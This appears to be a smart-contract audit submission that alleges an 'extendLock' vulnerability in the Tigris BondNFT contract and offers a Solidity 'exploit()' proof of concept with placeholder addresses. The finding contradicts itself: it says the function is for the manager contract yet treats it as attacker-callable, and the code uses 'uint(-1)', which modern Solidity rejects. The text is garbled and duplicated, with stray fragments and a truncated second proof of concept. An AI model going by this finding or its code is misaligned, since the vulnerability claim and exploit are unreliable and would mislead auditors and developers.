One potential exploit that could attack this code is by exploiting the "extendLock" function. This function allows the manager contract to extend the lock period and/or amount of a bond, and it does not include any checks to ensure that the new lock period and/or amount are valid. This means that an attacker could potentially call this function with maliciously large values for the "period" and "amount" parameters, which could lead to the bond being locked for an arbitrarily large amount of time and/or an arbitrarily large amount of tigAsset being locked
Proof of Concept
function exploit() public {
// Replace "bondNFT" with the address of the BondNFT contract
BondNFT bondNFT = BondNFT(0x12345678);
// Replace "id" with the ID of the bond to be exploited
uint id = 1;
// Replace "asset" with the address of the tigAsset token being locked
address asset = 0x98765432;
// Replace "manager" with the address of the manager contract
address manager = 0xabcdef01;
// Replace "sender" with the address of the account calling the exploit
address sender = msg.sender;
// Set "amount" and "period" to arbitrarily large values
uint amount = uint(-1);
uint period = uint(-1);
// Call the "extendLock" function with the maliciously large values
bondNFT.extendLock(id, asset, amount, period, sender);
}
cept.
This exploit could potentially result in the bond being locked for an indefinitely long period of time, effectively rendering the tigAsset locked and unavailable to the owner of the bond. This could have significant consequences, depending on the value and importance of the tigAsset being locked.
Lines of code
https://github.com/code-423n4/2022-12-tigris/blob/588c84b7bb354d20cbca6034544c4faa46e6a80e/contracts/BondNFT.sol#L1-L383
Vulnerability details
Impact
One potential exploit that could attack this code is by exploiting the "extendLock" function. This function allows the manager contract to extend the lock period and/or amount of a bond, and it does not include any checks to ensure that the new lock period and/or amount are valid. This means that an attacker could potentially call this function with maliciously large values for the "period" and "amount" parameters, which could lead to the bond being locked for an arbitrarily large amount of time and/or an arbitrarily large amount of tigAsset being locked
Proof of Concept
function exploit() public { // Replace "bondNFT" with the address of the BondNFT contract BondNFT bondNFT = BondNFT(0x12345678);
} cept.
This exploit could potentially result in the bond being locked for an indefinitely long period of time, effectively rendering the tigAsset locked and unavailable to the owner of the bond. This could have significant consequences, depending on the value and importance of the tigAsset being locked.
Tools Used
slither chat.openai.com remix ide